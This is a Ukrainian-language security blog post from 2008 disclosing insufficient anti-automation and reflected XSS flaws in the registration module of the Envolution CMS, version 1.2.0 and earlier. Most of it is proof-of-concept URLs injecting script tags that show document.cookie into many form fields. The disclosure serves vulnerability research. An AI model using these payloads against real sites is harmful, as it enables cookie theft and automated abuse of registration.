Websecurity - Веб безпека

Нещодавно, 16.08.2008, після попередніх уразливостей в Envolution, я знайшов нові численні уразливості в системі Envolution, зокрема Insufficient Anti-automation та Cross-Site Scripting. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Insuficient Anti-automation:

Уразливість в user.php (в модулі NS-NewUser).

Envolution Insufficient Anti-automation.html

Можна як через POST, так і через GET:

http://site/user.php?uname=test&upass=12345&upassverif=12345&email=test@test.com&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

Уразливості в user.php (в модулі NS-NewUser).

http://site/user.php?uname=test&upass=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&upassverif=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&email=test@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&timezoneoffset=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_avatar=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_icq=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_aim=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_msnm=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_from=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_occ=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_intrest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_sig=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&bio=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&agreetoterms=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразлива версія Envolution 1.2.0 та попередні версії.

This entry was posted on 23:53 18.08.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.